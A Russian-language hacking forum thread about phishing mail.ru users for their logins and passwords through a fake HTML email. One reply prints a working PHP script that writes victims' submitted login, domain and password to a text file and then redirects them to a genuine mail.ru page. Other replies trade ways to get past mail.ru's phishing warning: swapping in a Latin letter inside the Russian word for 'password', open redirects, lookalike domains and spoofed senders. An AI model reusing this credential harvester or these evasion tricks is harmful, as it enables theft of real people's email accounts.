Авторские статьи Взлом почты на mail.ru [СИ]

Прям так копировать.
Код предназначен для записи логина и пароля с mail.ru.

это комментарии...

 

Вопрос такой, если я отправила письмо в хтмл формате, а у меня в отправленных просто этот код, получателю придет то , что должно придти?

 

Отправь таким способом на другой свой емейл и посмотри как будет выглядеть...

 

у меня есть мыльник на маиле спец.для СИ. если чё,пиши в личку

 

Вот почему не надо читать письма от незнакомых людей ! =)

 

Ребята, помогите пожалуйста. Желание научиться есть. Но и пара вопросов появилась.

Я сделал все так, как в первом посте, но при отсылке письма на другой ящик, письмо блокируется сообщением следующего содержания:

Внимание! Администрация mail.ru никогда не запросит у Вас ваши логин и пароль.

Как я понял вся беда в сниффере:

PHP:

<?php
$f=fopen("mail.txt","at"); # файл куда сохранять
flock($f,2);
fputs($f,$_GET['Login']."@"); #логин
fputs($f,$_GET['Domain']); #домен
fputs($f,";".$_GET['Password']."\n"); # пароль
flock($f,3);
fclose($f);
?>
<script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>

А именно в теге <script>. Как можно обойти подобное? Посоветуйте, пожалуйста.

Разумеется в файле моем комментариев нет.

 

Не в сниффере, а в письме которое посылаешь. Скрипт майла реагирует так на слово пароль.

 

Хм, и как тогда обойти сие?

 

если правда реагирует на силово пароль то попробуй написать слово пароль так: пa(латинская)роль

 

не прокатило =( вероятно все дело в самих командах.

 

все дело в редиректе, у тебя указывет что ссылка ведет на внешний сайт(в твоем случае фейк), а надо так ссылка на майл- редирект на фейк (каждый использует лично свои редиректы и выкладывать их здесь наврядли будут- т к майл быстро все это дело фиксет)

 

И это всё? сдался? Может кто-нибудь попробует подумать?
Убери слово пароль наxyй из письма и посмотри результат. Предупреждение пропало? Отлично! думаем дальше, как бы нам всё же оставить это слово и чтоб малрушный скрипт не сдавал нас с потрохами. И не надо больше преждевременных неправильных выводов.

 

Месяц посвятил этому. Слово "пароль" убрал. Не помогло.

 

Babkin скинь в PM письмо которое посылаешь.

 

перезалейте архив плз!!!
для отправки письма с подменой адреса советую bogomol.net/incom/

 

я угораю эта статья была в 2008 пиши в ПМ челу может дает если сидит тут досихпор

 

Перезалейте скрипт от Ponchik'а!!!

 

Помнится была ещё тема с открытками. Там когда хотим посмотреть открытку переадресует на страницу с логином/паролем. Соответственно подменяем эту страницу на свою.

Кстати проверка на урл сайта куда идёт переход с формы в письме проверяется яваскриптом под телом письма и должен содержать "mail.ru". я так понимаю, если забить домен mail.ru.anydomen.ru, то прокатит и этот фейк.

Кстати следует задуматься над тем, что не обязательно вообще регить какой бы то не было хостинг, нужно реализовать отправку сообщения внутри mail.ru. Это явно поможет обойти защиту.

Только вот как это сделать я пока слабо представляю, хотя мысли есть.

 

хорошая статья, а прочитал только сегодня. Когда научусь делать что то лучше других - напишу статью тоже!

 

да,не плохо все расписано